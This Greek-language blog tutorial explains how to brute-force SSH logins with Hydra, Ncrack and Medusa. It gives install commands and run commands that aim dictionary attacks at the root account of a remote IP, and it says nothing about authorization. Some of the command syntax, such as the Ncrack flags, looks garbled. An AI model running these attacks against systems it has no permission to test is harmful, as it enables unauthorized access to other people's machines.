Bruteforce SSH με Hydra, Ncrack και Medusa

Οι Bruteforce επιθέσεις λειτουργούν δοκιμάζοντας κάθε πιθανό συνδυασμό που θα μπορούσε να χρησιμοποιηθεί ως κωδικός πρόσβασης από τον χρήστη. Για να δείτε εάν ο κωδικός πρόσβασης είναι σωστός ή όχι, ελέγξτε για τυχόν σφάλματα στην απάντηση από τον διακομιστή.

Τα εργαλεία που θα χρησιμοποιήσουμε για το bruteforce του SSH είναι:

  1. HYDRA
  2. NCRACK
  3. MEDUSA

Τώρα για να κάνετε bruteforce οπουδήποτε, χρειάζεστε μια καλή λίστα λεξικών που μπορείτε εύκολα να τη βρείτε μέσω της βάσης δεδομένων ασφαλείας Packet storm .

1) Bruteforce χρησιμοποιώντας το Hydra

Για να εγκαταστήσετε το Hydra σε ένα υπολογιστή με Kali Linux, πληκτρολογήστε την παρακάτω εντολή:

Εντολή: apt-get install hydra hydra-gtk

Για να τρέξει πληκτρολογήστε

Εντολή: hydra -l root -p ‘<File Dictionary>’ <Remote IP> SSH

2) Bruteforce χρησιμοποιώντας το Ncrack

Το Ncrack είναι λίγο πιο δύσκολο από το Hydra στη χρήση του, αλλά είναι πιο ισχυρό μεταξύ όλων των άλλων εργαλείων. Για να κατεβάσετε το Ncrack, δώστε την εντολή:

  Rainbow Tables ο εφιάλτης των κωδικών πρόσβασης

Εντολή: wget https://nmap.org/ncrack/dist/ncrack-0.5.tar.gz

Τώρα εξαγάγετε το πακέτο Ncrack με τη βοήθεια της εντολής Tar:

Εντολή: tar -xvzf ncrack-0.5.tar.gz

Τώρα πρέπει να διαμορφώσουμε και να συντάξουμε αυτό το ncrack πληκτρολογώντας τις εντολές ” ./configure “, ” make ” και ” make install “.

Για να χρησιμοποιήσετε το Ncrack, πληκτρολογήστε την παρακάτω εντολή στο τερματικό σας:

Εντολή: ncrack -p 22 –root root -p ‘<File Dictionary>’ <Remote IP>

3) Bruteforce χρησιμοποιώντας το Medusa

Το Medusa είναι ένα άλλο δημοφιλές εργαλείο bruteforcing μέσω του οποίου μπορείτε εύκολα να βρείτε τον κωδικό πρόσβασης SSH οποιουδήποτε απομακρυσμένου μηχανήματος.

Για να κατεβάσετε το Medusa στα Kali Linux, πληκτρολογήστε την παρακάτω εντολή:

Εντολή: wget http://www.foofus.net/jmk/tools/medusa-2.0.tar.gz

Τώρα για να εξαγάγετε το πακέτο λήψης medusa, πληκτρολογήστε:

Εντολή: tar -xvzf medusa-2.0.tar.gz

Τώρα μετά την εξαγωγή των αρχείων, το επόμενο βήμα που θα κάνουμε, είναι να διαμορφώσουμε το εργαλείο πληκτρολογώντας τις εντολές: “./configure”, “make” και “make install”.

Για να εκτελέσετε το Medusa, πληκτρολογήστε την ακόλουθη εντολή στο τερματικό σας:

  Επιτέλους το NIST αλλάζει πολιτική για τους κωδικούς πρόσβασης

Εντολή: medusa -u root -p ‘<File Dictionary>’ -h <Remote IP> -m ssh

Ακολουθήσετε μας στο Google News iGuRu.gr at Google news

Written by Anastasis Vasileiadis

Οι μεταφράσεις είναι σαν τις γυναίκες. Όταν είναι ωραίες δεν είναι πιστές και όταν είναι πιστές δεν είναι ωραίες.

Αφήστε μια απάντηση

Η ηλ. διεύθυνση σας δεν δημοσιεύεται.

Το μήνυμα σας δεν θα δημοσιευτεί εάν:
1. Περιέχει υβριστικά, συκοφαντικά, ρατσιστικά, προσβλητικά ή ανάρμοστα σχόλια.
2. Προκαλεί βλάβη σε ανηλίκους.
3. Παρενοχλεί την ιδιωτική ζωή και τα ατομικά και κοινωνικά δικαιώματα άλλων χρηστών.
4. Διαφημίζει προϊόντα ή υπηρεσίες ή διαδικτυακούς τόπους .
5. Περιέχει προσωπικές πληροφορίες (διεύθυνση, τηλέφωνο κλπ).


63  +    =  67